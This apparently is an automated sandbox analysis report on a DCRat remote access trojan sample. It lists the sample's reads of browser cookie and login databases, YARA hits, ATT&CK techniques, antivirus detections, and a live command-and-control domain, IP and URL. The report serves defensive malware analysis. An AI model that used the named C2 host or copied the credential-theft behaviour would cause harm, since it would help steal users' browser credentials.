Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 0.2.QMT2731i8k.exe.2480000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QMT2731i8k.exe.2480000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4109389958.000000000285B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4109389958.0000000002CDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1680583848.000000001266D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4109389958.0000000002B52000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1677712641.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QMT2731i8k.exe PID: 7504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qioiNOJzhriMVnsRuLz.exe PID: 7852, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	141 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	1 Taint Shared Content	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	12 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	135 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	311 Registry Run Keys / Startup Folder	311 Registry Run Keys / Startup Folder	11 Obfuscated Files or Information	Security Account Manager	341 Security Software Discovery	SMB/Windows Admin Shares	1 Clipboard Data	12 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Software Packing	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	251 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	131 Masquerading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	251 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
QMT2731i8k.exe	68%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
QMT2731i8k.exe	60%	Virustotal		Browse
QMT2731i8k.exe	100%	Avira	TR/Dropper.Gen
QMT2731i8k.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\bsHDGyqA5r.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\ZmxZjBOz.log	100%	Avira	TR/PSW.Agent.qngqt
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\Desktop\zBjMJrtf.log	100%	Avira	TR/PSW.Agent.qngqt
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe	100%	Avira	TR/Dropper.Gen
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\Desktop\PDeJzYJR.log	100%	Avira	TR/AVI.Agent.updqb
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe	100%	Avira	TR/Dropper.Gen
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\Desktop\hpHHpWYQ.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\ZmxZjBOz.log	100%	Joe Sandbox ML
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\zBjMJrtf.log	100%	Joe Sandbox ML
C:\Windows\System32\SecurityHealthSystray.exe	100%	Joe Sandbox ML
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe	100%	Joe Sandbox ML
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\WBdQFKdi.log	100%	Joe Sandbox ML
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe	100%	Joe Sandbox ML
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\EPzTPNOj.log	100%	Joe Sandbox ML
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe	68%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Recovery\qioiNOJzhriMVnsRuLz.exe	68%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Users\user\Desktop\EPzTPNOj.log	8%	ReversingLabs
C:\Users\user\Desktop\GZVUPftk.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\PDeJzYJR.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\TtUAGVJK.log	24%	ReversingLabs
C:\Users\user\Desktop\WBdQFKdi.log	8%	ReversingLabs
C:\Users\user\Desktop\YLzRFcIi.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\ZmxZjBOz.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\hpHHpWYQ.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\kfyxwSYJ.log	24%	ReversingLabs
C:\Users\user\Desktop\zBjMJrtf.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	68%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	68%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	68%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat

Source	Detection	Scanner	Label	Link
http://117813cm.n9PX	0%	Avira URL Cloud	safe
http://117813cm.n9shteam.in/ExternalRequest.php	100%	Avira URL Cloud	malware
http://117813cm.n9shteam.in/	100%	Avira URL Cloud	malware
http://117813cm.n9shteam.inPf	0%	Avira URL Cloud	safe
http://117813cm.n9shteam.in/ExternalRequest.phpn/Ex	100%	Avira URL Cloud	malware
http://117813cm.n9shteam.in/ExternalRequest.php	1%	Virustotal		Browse
http://117813cm.n9shteam.in	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
117813cm.n9shteam.in	37.44.238.250	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://117813cm.n9shteam.in/ExternalRequest.php	true	1%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	wl6u8IBdDL.8.dr, 3R4C3berUq.8.dr, fxBB58GFxm.8.dr, Sz2didTDsQ.8.dr, dzr1IbElpJ.8.dr, 3mH0e2wtGq.8.dr, BQnmgjEPAd.8.dr, EDNFNRqRCX.8.dr, r6nO9PrJ2r.8.dr, RQS80wxHC2.8.dr, 4VNTeugUym.8.dr, QIM4VpF7vn.8.dr, xs44qKjcu4.8.dr, axygeUNep6.8.dr, E18nFEV4jl.8.dr, A0TnQG2wZy.8.dr, PAT9mlbxus.8.dr, BSqLFpKJBy.8.dr, 9Serf4iVwm.8.dr, p8zvYAKG67.8.dr, LHhG3wYAvF.8.dr	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	QHmjTo927m.8.dr	false		high
http://www.fontbureau.com/designersG	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	wl6u8IBdDL.8.dr, 3R4C3berUq.8.dr, fxBB58GFxm.8.dr, Sz2didTDsQ.8.dr, dzr1IbElpJ.8.dr, 3mH0e2wtGq.8.dr, BQnmgjEPAd.8.dr, EDNFNRqRCX.8.dr, r6nO9PrJ2r.8.dr, RQS80wxHC2.8.dr, 4VNTeugUym.8.dr, QIM4VpF7vn.8.dr, xs44qKjcu4.8.dr, axygeUNep6.8.dr, E18nFEV4jl.8.dr, A0TnQG2wZy.8.dr, PAT9mlbxus.8.dr, BSqLFpKJBy.8.dr, 9Serf4iVwm.8.dr, p8zvYAKG67.8.dr, LHhG3wYAvF.8.dr	false		high
http://www.fontbureau.com/designers/?	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	wl6u8IBdDL.8.dr, 3R4C3berUq.8.dr, fxBB58GFxm.8.dr, Sz2didTDsQ.8.dr, dzr1IbElpJ.8.dr, 3mH0e2wtGq.8.dr, BQnmgjEPAd.8.dr, EDNFNRqRCX.8.dr, r6nO9PrJ2r.8.dr, RQS80wxHC2.8.dr, 4VNTeugUym.8.dr, QIM4VpF7vn.8.dr, xs44qKjcu4.8.dr, axygeUNep6.8.dr, E18nFEV4jl.8.dr, A0TnQG2wZy.8.dr, PAT9mlbxus.8.dr, BSqLFpKJBy.8.dr, 9Serf4iVwm.8.dr, p8zvYAKG67.8.dr, LHhG3wYAvF.8.dr	false		high
http://www.fontbureau.com/designers	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.000000000285B000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000013588000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000013711000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.00000000134E3000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000013400000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000012D89000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.000000001366B000.00000004.00000800.00020000.00000000.sdmp, zH6ODGHWVs.8.dr, O06yTeSelT.8.dr, tyMvg3p7gV.8.dr, Iwk8nVZifj.8.dr, HOU1YLTqTo.8.dr, UEgt634ZBI.8.dr, BHcZiwPpaf.8.dr, AYaEK7y8b6.8.dr, qjBxaNG8Qr.8.dr, 4Ca6TwAakY.8.dr, uV7ZCuCyFP.8.dr, C8TzAweWcR.8.dr, PCEHZ8WFFm.8.dr, RVXqOeieD9.8.dr	false		high
http://www.goodfont.co.kr	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.00000000133DB000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.00000000136EC000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.00000000147AA000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000013648000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.00000000134BE000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000013563000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000012D64000.00000004.00000800.00020000.00000000.sdmp, zH6ODGHWVs.8.dr, O06yTeSelT.8.dr, tyMvg3p7gV.8.dr, Iwk8nVZifj.8.dr, HOU1YLTqTo.8.dr, UEgt634ZBI.8.dr, BHcZiwPpaf.8.dr, AYaEK7y8b6.8.dr, qjBxaNG8Qr.8.dr, 4Ca6TwAakY.8.dr, uV7ZCuCyFP.8.dr, C8TzAweWcR.8.dr, PCEHZ8WFFm.8.dr, RVXqOeieD9.8.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	wl6u8IBdDL.8.dr, 3R4C3berUq.8.dr, fxBB58GFxm.8.dr, Sz2didTDsQ.8.dr, dzr1IbElpJ.8.dr, 3mH0e2wtGq.8.dr, BQnmgjEPAd.8.dr, EDNFNRqRCX.8.dr, r6nO9PrJ2r.8.dr, RQS80wxHC2.8.dr, 4VNTeugUym.8.dr, QIM4VpF7vn.8.dr, xs44qKjcu4.8.dr, axygeUNep6.8.dr, E18nFEV4jl.8.dr, A0TnQG2wZy.8.dr, PAT9mlbxus.8.dr, BSqLFpKJBy.8.dr, 9Serf4iVwm.8.dr, p8zvYAKG67.8.dr, LHhG3wYAvF.8.dr	false		high
http://117813cm.n9PX	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.0000000002CDB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	QMT2731i8k.exe, 00000000.00000002.1677840960.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.000000000285B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	wl6u8IBdDL.8.dr, 3R4C3berUq.8.dr, fxBB58GFxm.8.dr, Sz2didTDsQ.8.dr, dzr1IbElpJ.8.dr, 3mH0e2wtGq.8.dr, BQnmgjEPAd.8.dr, EDNFNRqRCX.8.dr, r6nO9PrJ2r.8.dr, RQS80wxHC2.8.dr, 4VNTeugUym.8.dr, QIM4VpF7vn.8.dr, xs44qKjcu4.8.dr, axygeUNep6.8.dr, E18nFEV4jl.8.dr, A0TnQG2wZy.8.dr, PAT9mlbxus.8.dr, BSqLFpKJBy.8.dr, 9Serf4iVwm.8.dr, p8zvYAKG67.8.dr, LHhG3wYAvF.8.dr	false		high
http://117813cm.n9shteam.in/ExternalRequest.phpn/Ex	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.00000000029D5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	wl6u8IBdDL.8.dr, 3R4C3berUq.8.dr, fxBB58GFxm.8.dr, Sz2didTDsQ.8.dr, dzr1IbElpJ.8.dr, 3mH0e2wtGq.8.dr, BQnmgjEPAd.8.dr, EDNFNRqRCX.8.dr, r6nO9PrJ2r.8.dr, RQS80wxHC2.8.dr, 4VNTeugUym.8.dr, QIM4VpF7vn.8.dr, xs44qKjcu4.8.dr, axygeUNep6.8.dr, E18nFEV4jl.8.dr, A0TnQG2wZy.8.dr, PAT9mlbxus.8.dr, BSqLFpKJBy.8.dr, 9Serf4iVwm.8.dr, p8zvYAKG67.8.dr, LHhG3wYAvF.8.dr	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.000000000285B000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000013588000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000013711000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.00000000134E3000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000013400000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000012D89000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.000000001366B000.00000004.00000800.00020000.00000000.sdmp, zH6ODGHWVs.8.dr, O06yTeSelT.8.dr, tyMvg3p7gV.8.dr, Iwk8nVZifj.8.dr, HOU1YLTqTo.8.dr, UEgt634ZBI.8.dr, BHcZiwPpaf.8.dr, AYaEK7y8b6.8.dr, qjBxaNG8Qr.8.dr, 4Ca6TwAakY.8.dr, uV7ZCuCyFP.8.dr, C8TzAweWcR.8.dr, PCEHZ8WFFm.8.dr, RVXqOeieD9.8.dr	false		high
http://117813cm.n9shteam.inPf	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.00000000029D5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	wl6u8IBdDL.8.dr, 3R4C3berUq.8.dr, fxBB58GFxm.8.dr, Sz2didTDsQ.8.dr, dzr1IbElpJ.8.dr, 3mH0e2wtGq.8.dr, BQnmgjEPAd.8.dr, EDNFNRqRCX.8.dr, r6nO9PrJ2r.8.dr, RQS80wxHC2.8.dr, 4VNTeugUym.8.dr, QIM4VpF7vn.8.dr, xs44qKjcu4.8.dr, axygeUNep6.8.dr, E18nFEV4jl.8.dr, A0TnQG2wZy.8.dr, PAT9mlbxus.8.dr, BSqLFpKJBy.8.dr, 9Serf4iVwm.8.dr, p8zvYAKG67.8.dr, LHhG3wYAvF.8.dr	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	QHmjTo927m.8.dr	false		high
https://support.mozilla.org/products/firefox	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.000000000285B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
http://117813cm.n9shteam.in/	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.000000000285B000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	wl6u8IBdDL.8.dr, 3R4C3berUq.8.dr, fxBB58GFxm.8.dr, Sz2didTDsQ.8.dr, dzr1IbElpJ.8.dr, 3mH0e2wtGq.8.dr, BQnmgjEPAd.8.dr, EDNFNRqRCX.8.dr, r6nO9PrJ2r.8.dr, RQS80wxHC2.8.dr, 4VNTeugUym.8.dr, QIM4VpF7vn.8.dr, xs44qKjcu4.8.dr, axygeUNep6.8.dr, E18nFEV4jl.8.dr, A0TnQG2wZy.8.dr, PAT9mlbxus.8.dr, BSqLFpKJBy.8.dr, 9Serf4iVwm.8.dr, p8zvYAKG67.8.dr, LHhG3wYAvF.8.dr	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org	QHmjTo927m.8.dr	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.00000000133DB000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.00000000136EC000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.00000000147AA000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000013648000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.00000000134BE000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000013563000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4119285717.0000000012D64000.00000004.00000800.00020000.00000000.sdmp, zH6ODGHWVs.8.dr, O06yTeSelT.8.dr, tyMvg3p7gV.8.dr, Iwk8nVZifj.8.dr, HOU1YLTqTo.8.dr, UEgt634ZBI.8.dr, BHcZiwPpaf.8.dr, AYaEK7y8b6.8.dr, qjBxaNG8Qr.8.dr, 4Ca6TwAakY.8.dr, 